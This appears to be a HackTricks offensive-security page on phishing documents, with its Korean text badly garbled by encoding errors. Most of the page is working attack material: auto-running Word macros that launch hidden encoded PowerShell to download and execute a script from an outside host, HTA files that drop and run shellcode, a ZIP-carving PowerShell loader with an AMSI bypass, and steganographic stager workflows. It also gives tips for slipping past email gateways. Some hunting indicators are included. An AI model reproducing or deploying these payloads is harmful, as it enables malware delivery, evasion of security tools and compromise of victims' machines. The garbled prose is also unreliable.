Phishing ํ์ผ ๋ฐ ๋ฌธ์
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Office ๋ฌธ์
Microsoft Word๋ ํ์ผ์ ์ด๊ธฐ ์ ์ ํ์ผ ๋ฐ์ดํฐ ์ ํจ์ฑ ๊ฒ์ฌ๋ฅผ ์ํํฉ๋๋ค. ๋ฐ์ดํฐ ์ ํจ์ฑ ๊ฒ์ฌ๋ OfficeOpenXML ํ์ค์ ๋ฐ๋ผ ๋ฐ์ดํฐ ๊ตฌ์กฐ ์๋ณ์ ํํ๋ก ์ํ๋ฉ๋๋ค. ๋ฐ์ดํฐ ๊ตฌ์กฐ ์๋ณ ์ค์ ์ค๋ฅ๊ฐ ๋ฐ์ํ๋ฉด ๋ถ์ ์ค์ธ ํ์ผ์ ์ด๋ฆฌ์ง ์์ต๋๋ค.
๋ณดํต ๋งคํฌ๋ก๋ฅผ ํฌํจํ Word ํ์ผ์ .docm ํ์ฅ์๋ฅผ ์ฌ์ฉํฉ๋๋ค. ๊ทธ๋ฌ๋ ํ์ผ ํ์ฅ์๋ฅผ ๋ณ๊ฒฝํด ํ์ผ ์ด๋ฆ์ ๋ฐ๊พธ์ด๋ ๋งคํฌ๋ก ์คํ ๊ธฐ๋ฅ์ ์ ์งํ๋ ๊ฒ์ด ๊ฐ๋ฅํฉ๋๋ค.
์๋ฅผ ๋ค์ด, RTF ํ์ผ์ ์ค๊ณ์ ๋งคํฌ๋ก๋ฅผ ์ง์ํ์ง ์์ง๋ง, DOCM ํ์ผ์ RTF๋ก ์ด๋ฆ์ ๋ฐ๊พธ๋ฉด Microsoft Word๊ฐ ํด๋น ํ์ผ์ ์ฒ๋ฆฌํ์ฌ ๋งคํฌ๋ก๋ฅผ ์คํํ ์ ์์ต๋๋ค.
๋์ผํ ๋ด๋ถ ๊ตฌ์กฐ์ ๋ฉ์ปค๋์ฆ์ด Microsoft Office Suite์ ๋ชจ๋ ์ํํธ์จ์ด(Excel, PowerPoint ๋ฑ)์ ์ ์ฉ๋ฉ๋๋ค.
๋ค์ ๋ช ๋ น์ ์ฌ์ฉํ์ฌ ์ผ๋ถ Office ํ๋ก๊ทธ๋จ์์ ์คํ๋ ํ์ฅ์๋ฅผ ํ์ธํ ์ ์์ต๋๋ค:
assoc | findstr /i "word excel powerp"
DOCX files referencing a remote template (File โOptions โAdd-ins โManage: Templates โGo) that includes macros can โexecuteโ macros as well.
์ธ๋ถ ์ด๋ฏธ์ง ๋ก๋
Go to: Insert โ> Quick Parts โ> Field
์นดํ
๊ณ ๋ฆฌ: Links and References, Filed names: includePicture, and ํ์ผ ์ด๋ฆ ๋๋ URL: http://
.png)
Macros Backdoor
๋ฌธ์์์ macros๋ฅผ ์ฌ์ฉํด ์์์ code๋ฅผ ์คํํ ์ ์๋ค.
์๋ ๋ก๋ ํจ์
๋ ํํ ์๋ก AV๊ฐ ํ์งํ ๊ฐ๋ฅ์ฑ์ด ๋์์ง๋ค.
- AutoOpen()
- Document_Open()
Macros Code Examples
Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"
End Sub
Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1
Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>
์๋์ผ๋ก ๋ฉํ๋ฐ์ดํฐ ์ ๊ฑฐ
๋ค์์ผ๋ก ์ด๋: File > Info > Inspect Document > Inspect Document, ๊ทธ๋ฌ๋ฉด Document Inspector๊ฐ ํ์๋ฉ๋๋ค. Inspect๋ฅผ ํด๋ฆญํ ๋ค์ Document Properties and Personal Information ์์ Remove All์ ํด๋ฆญํ์ธ์.
Doc Extension
์์
์ด ๋๋๋ฉด Save as type ๋๋กญ๋ค์ด์ ์ ํํ๊ณ ํ์์ **.docx**์์ **Word 97-2003 .doc**๋ก ๋ณ๊ฒฝํ์ธ์.
์ด๋ ๊ฒ ํ๋ ์ด์ ๋ .docx ์์๋ ๋งคํฌ๋ก๋ฅผ ์ ์ฅํ ์ ์๊ณ ๋งคํฌ๋ก ์ฌ์ฉ ๊ฐ๋ฅํ .docm ํ์ฅ์์๋ ๋์ธ(stigma)์ด ์์ด(์: ์ธ๋ค์ผ ์์ด์ฝ์ ํฐ !๊ฐ ํ์๋๊ณ ์ผ๋ถ ์น/์ด๋ฉ์ผ ๊ฒ์ดํธ์จ์ด๊ฐ ์ด๋ฅผ ์ ๋ถ ์ฐจ๋จํจ) ๋ฐ๋ผ์ ์ด ๋ ๊ฑฐ์ .doc ํ์ฅ์๊ฐ ์ต์ ์ ํํ์
๋๋ค.
Malicious Macros Generators
HTA Files
HTA๋ HTML๊ณผ ์คํฌ๋ฆฝํ ์ธ์ด(์: VBScript ๋ฐ JScript)๋ฅผ ๊ฒฐํฉํ Windows ํ๋ก๊ทธ๋จ์ ๋๋ค. ์ด๋ ์ฌ์ฉ์ ์ธํฐํ์ด์ค๋ฅผ ์์ฑํ๊ณ ๋ธ๋ผ์ฐ์ ์ ๋ณด์ ๋ชจ๋ธ ์ ์ฝ์ ๋ฐ์ง ์๋ โfully trustedโ ์ ํ๋ฆฌ์ผ์ด์ ์ผ๋ก ์คํ๋ฉ๋๋ค.
HTA๋ **mshta.exe**๋ฅผ ์ฌ์ฉํด ์คํ๋๋ฉฐ, ๋ณดํต Internet Explorer์ ํจ๊ป ์ค์น๋์ด ์๊ธฐ ๋๋ฌธ์ mshta๋ IE์ ์์กดํฉ๋๋ค. ๋ฐ๋ผ์ Internet Explorer๊ฐ ์ ๊ฑฐ๋์ด ์๋ค๋ฉด HTA๋ ์คํํ ์ ์์ต๋๋ค.
<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>
<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function
Pwn
</script>
</html>
<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"
Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function
var_func
self.close
</script>
NTLM ์ธ์ฆ ๊ฐ์ ํ๊ธฐ
์๊ฒฉ์ผ๋ก NTLM ์ธ์ฆ์ ๊ฐ์ ํ๋ ๋ฐฉ๋ฒ์ ์ฌ๋ฌ ๊ฐ์ง๊ฐ ์๋ค. ์๋ฅผ ๋ค์ด, ์ฌ์ฉ์๊ฐ ์ ๊ทผํ ์ด๋ฉ์ผ์ด๋ HTML์ ๋ณด์ด์ง ์๋ ์ด๋ฏธ์ง๋ฅผ ์ถ๊ฐํ๊ฑฐ๋(HTTP MitM ํฌํจ?), ํผํด์์๊ฒ ํด๋๋ฅผ ์ฌ๋ ๊ฒ๋ง์ผ๋ก ์ธ์ฆ์ ์ ๋ฐํ๋ ํ์ผ ์ฃผ์๋ฅผ ๋ณด๋ผ ์ ์๋ค.
๋ค์ ํ์ด์ง๋ค์์ ์ด๋ฌํ ์์ด๋์ด์ ๋ ๋ง์ ๋ด์ฉ์ ํ์ธํ๋ผ:
Force NTLM Privileged Authentication
NTLM Relay
ํด์๋ ์ธ์ฆ ์ ๋ณด๋ฅผ ํ์น๋ ๊ฒ๋ฟ๋ง ์๋๋ผ NTLM relay ๊ณต๊ฒฉ์ ์ํํ ์ ์๋ค๋ ์ ์ ์์ง ๋ง์:
LNK Loaders + ZIP-Embedded Payloads (fileless chain)
๋งค์ฐ ํจ๊ณผ์ ์ธ ์บ ํ์ธ์ ๋ ๊ฐ์ ์ ์์ ์ธ ๋ฏธ๋ผ ๋ฌธ์(PDF/DOCX)์ ์ ์ฑ .lnk ๋ฅผ ํฌํจํ ZIP์ ์ ๋ฌํ๋ค. ํต์ฌ์ ์ค์ PowerShell loader๊ฐ ๊ณ ์ ํ ๋ง์ปค ์ดํ ZIP์ raw bytes ์์ ์ ์ฅ๋์ด ์๊ณ , .lnk๊ฐ ์ด๋ฅผ carveํ์ฌ ๋ฉ๋ชจ๋ฆฌ์์ ์์ ํ ์คํํ๋ค๋ ๊ฒ์ด๋ค.
Typical flow implemented by the .lnk PowerShell one-liner:
- Desktop, Downloads, Documents, %TEMP%, %ProgramData%, ํ์ฌ ์์ ๋๋ ํฐ๋ฆฌ์ ์์ ํด๋ ๋ฑ ์ผ๋ฐ ๊ฒฝ๋ก์์ ์๋ณธ ZIP์ ์ฐพ๋๋ค.
- ZIP ๋ฐ์ดํธ๋ฅผ ์ฝ์ด ํ๋์ฝ๋ฉ๋ ๋ง์ปค(e.g., xFIQCV)๋ฅผ ์ฐพ๋๋ค. ๋ง์ปค ์ดํ์ ๋ชจ๋ ๊ฒ์ด ์๋ฒ ๋๋๋ PowerShell ํ์ด๋ก๋๋ค.
- ZIP์ %ProgramData%๋ก ๋ณต์ฌํ๊ณ , ๊ทธ๊ณณ์์ ์ถ์ถํ ๋ค ๋ฏธ๋ผ .docx๋ฅผ ์ด์ด ์ ๋นํด ๋ณด์ด๊ฒ ํ๋ค.
- ํ์ฌ ํ๋ก์ธ์ค์ ๋ํด AMSI๋ฅผ ์ฐํํ๋ค: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
- ๋ค์ ๋จ๊ณ(์: ๋ชจ๋ # ๋ฌธ์๋ฅผ ์ ๊ฑฐ)๋ฅผ ๋์ต์ ์ผ์ดํธํ๊ณ ๋ฉ๋ชจ๋ฆฌ์์ ์คํํ๋ค.
Example PowerShell skeleton to carve and run the embedded stage:
$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths = @(
"$env:USERPROFILE\Desktop", "$env:USERPROFILE\Downloads", "$env:USERPROFILE\Documents",
"$env:TEMP", "$env:ProgramData", (Get-Location).Path, (Get-Item '..').FullName
)
$zip = Get-ChildItem -Path $paths -Filter *.zip -ErrorAction SilentlyContinue -Recurse | Sort-Object LastWriteTime -Descending | Select-Object -First 1
if(-not $zip){ return }
$bytes = [IO.File]::ReadAllBytes($zip.FullName)
$idx = [System.MemoryExtensions]::IndexOf($bytes, $marker)
if($idx -lt 0){ return }
$stage = $bytes[($idx + $marker.Length) .. ($bytes.Length-1)]
$code = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Expression $code
Notes
- ๋ฐฐํฌ๋ ์ข ์ข ํํ์ด ์ข์ PaaS ํ์ ๋๋ฉ์ธ(์: *.herokuapp.com)์ ์ ์ฉํ๋ฉฐ ํ์ด๋ก๋๋ฅผ ์ฐจ๋จํ ์ ์๋ค(์: IP/UA์ ๋ฐ๋ผ ์ ์ ZIP ํ์ผ ์ ๊ณต).
- ๋ค์ ๋จ๊ณ์์๋ ํํ base64/XOR shellcode๋ฅผ ๋ณตํธํํ์ฌ ๋์คํฌ ํ์ ์ ์ต์ํํ๊ธฐ ์ํด Reflection.Emit + VirtualAlloc์ ํตํด ์คํํ๋ค.
Persistence used in the same chain
- Microsoft Web Browser control์ COM TypeLib hijacking์ผ๋ก, IE/Explorer ๋๋ ์ด๋ฅผ ์๋ฒ ๋ฉํ ์ฑ์ด ํ์ด๋ก๋๋ฅผ ์๋์ผ๋ก ์ฌ์คํํ๊ฒ ํ๋ค. ์์ธํ ๋ด์ฉ๊ณผ ๋ฐ๋ก ์ฌ์ฉํ ์ ์๋ ๋ช ๋ น์ ๋ค์์ ์ฐธ์กฐ:
Hunting/IOCs
- ์์นด์ด๋ธ ๋ฐ์ดํฐ ๋์ ASCII ๋ง์ปค ๋ฌธ์์ด(์: xFIQCV)์ด ์ถ๊ฐ๋ ZIP ํ์ผ.
- .lnk๊ฐ ์์/์ฌ์ฉ์ ํด๋๋ฅผ ์ด๊ฑฐํ์ฌ ZIP์ ์ฐพ์ ๋ฏธ๋ผ ๋ฌธ์๋ฅผ ์ฐ๋ค.
- AMSI ๋ณ์กฐ via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
- ์ ๋ขฐ๋ PaaS ๋๋ฉ์ธ์ ํธ์คํ ๋ ๋งํฌ๋ก ๋๋๋ ์ฅ๊ธฐ ์คํ ๋น์ฆ๋์ค ์ค๋ ๋.
Steganography-delimited payloads in images (PowerShell stager)
์ต๊ทผ ๋ก๋ ์ฒด์ธ์ ๋๋ ํ๋ JavaScript/VBS๋ฅผ ์ ๋ฌํ์ฌ Base64 PowerShell stager๋ฅผ ๋ณตํธํํ๊ณ ์คํํ๊ฒ ํ๋ค. ํด๋น stager๋ ์ด๋ฏธ์ง(์ข ์ข GIF)๋ฅผ ๋ค์ด๋ก๋ํ๋๋ฐ, ๊ทธ ์ด๋ฏธ์ง์๋ ๊ณ ์ ํ ์์/์ข ๋ฃ ๋ง์ปค ์ฌ์ด์ ํ๋ฌธ์ผ๋ก ์จ๊ฒจ์ง Base64-encoded .NET DLL์ด ํฌํจ๋์ด ์๋ค. ์คํฌ๋ฆฝํธ๋ ์ด๋ฌํ ๊ตฌ๋ถ์(delimiters)๋ฅผ ๊ฒ์(์ค์ ์ฌ๋ก ์: ยซ<<sudo_png>> โฆ <<sudo_odt>>>ยป), ์ฌ์ด์ ํ ์คํธ๋ฅผ ์ถ์ถํ์ฌ Base64๋ก ๋์ฝ๋ฉํด ๋ฐ์ดํธ๋ก ๋ณํํ๊ณ , ์ด์ ๋ธ๋ฆฌ๋ฅผ ๋ฉ๋ชจ๋ฆฌ์์ ๋ก๋ํ ๋ค์ C2 URL์ ์ธ์๋ก ํ์ฌ ์๋ ค์ง ์ง์ ๋ฉ์๋๋ฅผ ํธ์ถํ๋ค.
Workflow
- Stage 1: ์์นด์ด๋ธ๋ JS/VBS dropper โ ๋ด์ฅ๋ Base64๋ฅผ ๋์ฝ๋ฉ โ -nop -w hidden -ep bypass ์ต์ ์ผ๋ก PowerShell stager ์คํ.
- Stage 2: PowerShell stager โ ์ด๋ฏธ์ง ๋ค์ด๋ก๋, ๋ง์ปค๋ก ๊ตฌ๋ถ๋ Base64๋ฅผ carvingํ์ฌ .NET DLL์ ๋ฉ๋ชจ๋ฆฌ์์ ๋ก๋ํ๊ณ ํด๋น ๋ฉ์๋(e.g., VAI)๋ฅผ C2 URL๊ณผ ์ต์ ์ ์ ๋ฌํ์ฌ ํธ์ถ.
- Stage 3: Loader๊ฐ ์ต์ข ํ์ด๋ก๋๋ฅผ ๊ฐ์ ธ์ ์ผ๋ฐ์ ์ผ๋ก process hollowing์ ํตํด ์ ๋ขฐ๋ ๋ฐ์ด๋๋ฆฌ(์ฃผ๋ก MSBuild.exe)์ ์ธ์ ์ . process hollowing ๋ฐ trusted utility proxy execution์ ๋ํ ์์ธํ ๋ด์ฉ์ ๋ค์ ์ฐธ์กฐ:
PowerShell example to carve a DLL from an image and invoke a .NET method in-memory:
PowerShell stego ํ์ด๋ก๋ ์ถ์ถ๊ธฐ ๋ฐ ๋ก๋
```powershell # Download the carrier image and extract a Base64 DLL between custom markers, then load and invoke it in-memory param( [string]$Url = 'https://example.com/payload.gif', [string]$StartM = '<๋ ธํธ
- This is ATT&CK T1027.003 (steganography/marker-hiding). Markers vary between campaigns.
- AMSI/ETW bypass and string deobfuscation์ ์ด์ ๋ธ๋ฆฌ๋ฅผ ๋ก๋ํ๊ธฐ ์ ์ ์ผ๋ฐ์ ์ผ๋ก ์ ์ฉ๋ฉ๋๋ค.
- ํ์ง: ๋ค์ด๋ก๋๋ ์ด๋ฏธ์ง์์ ์๋ ค์ง ๊ตฌ๋ถ์๋ฅผ ๊ฒ์ํ๊ณ , PowerShell์ด ์ด๋ฏธ์ง๋ฅผ ์ ๊ทผํ์ฌ ์ฆ์ Base64 ๋ธ๋กญ์ ๋์ฝ๋ฉํ๋ ๊ฒ์ ์๋ณํฉ๋๋ค.
See also stego tools and carving techniques:
Quick Triage Checklist First 10 Minutes
JS/VBS droppers โ Base64 PowerShell staging
๋ฐ๋ณต๋๋ ์ด๊ธฐ ๋จ๊ณ๋ ์์นด์ด๋ธ ์์ ํฌํจ๋์ด ์ ๋ฌ๋๋ ์๊ณ ๊ฐํ๊ฒ ๋๋
ํ๋ .js ๋๋ .vbs์
๋๋ค. ๊ทธ ์ ์ผํ ๋ชฉ์ ์ ๋ด์ฅ๋ Base64 ๋ฌธ์์ด์ ๋์ฝ๋ฉํ๊ณ -nop -w hidden -ep bypass ์ต์
์ผ๋ก PowerShell์ ์คํํ์ฌ HTTPS๋ฅผ ํตํด ๋ค์ ๋จ๊ณ๋ฅผ ๋ถํธ์คํธ๋ฉํ๋ ๊ฒ์
๋๋ค.
๊ณจ๊ฒฉ ๋ก์ง (์ถ์):
- ์์ ์ ํ์ผ ๋ด์ฉ์ ์ฝ์
- ๋ถํ์ํ ๋ฌธ์์ด๋ค ์ฌ์ด์ Base64 ๋ธ๋กญ์ ์ฐพ์
- ASCII ํํ์ PowerShell ์ฝ๋๋ก ๋์ฝ๋ฉ
wscript.exe/cscript.exe๋กpowershell.exe๋ฅผ ํธ์ถํ์ฌ ์คํ
ํ์ง ๋จ์
- ์์นด์ด๋ธ๋ JS/VBS ์ฒจ๋ถํ์ผ์ด ๋ช
๋ น์ค์
-enc/FromBase64String๋ฅผ ํฌํจํ์ฌpowershell.exe๋ฅผ ์คํํจ. - ์ฌ์ฉ์ ์์ ๊ฒฝ๋ก์์
wscript.exe๊ฐpowershell.exe -nop -w hidden์ ์คํํจ.
Windows files to steal NTLM hashes
๋ค์ ํ์ด์ง์์ places to steal NTLM creds๋ฅผ ํ์ธํ์ธ์:
References
- Check Point Research โ ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies
- Hijack the TypeLib โ New COM persistence technique (CICADA8)
- Unit 42 โ PhantomVAI Loader Delivers a Range of Infostealers
- MITRE ATT&CK โ Steganography (T1027.003)
- MITRE ATT&CK โ Process Hollowing (T1055.012)
- MITRE ATT&CK โ Trusted Developer Utilities Proxy Execution: MSBuild (T1127.001)
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


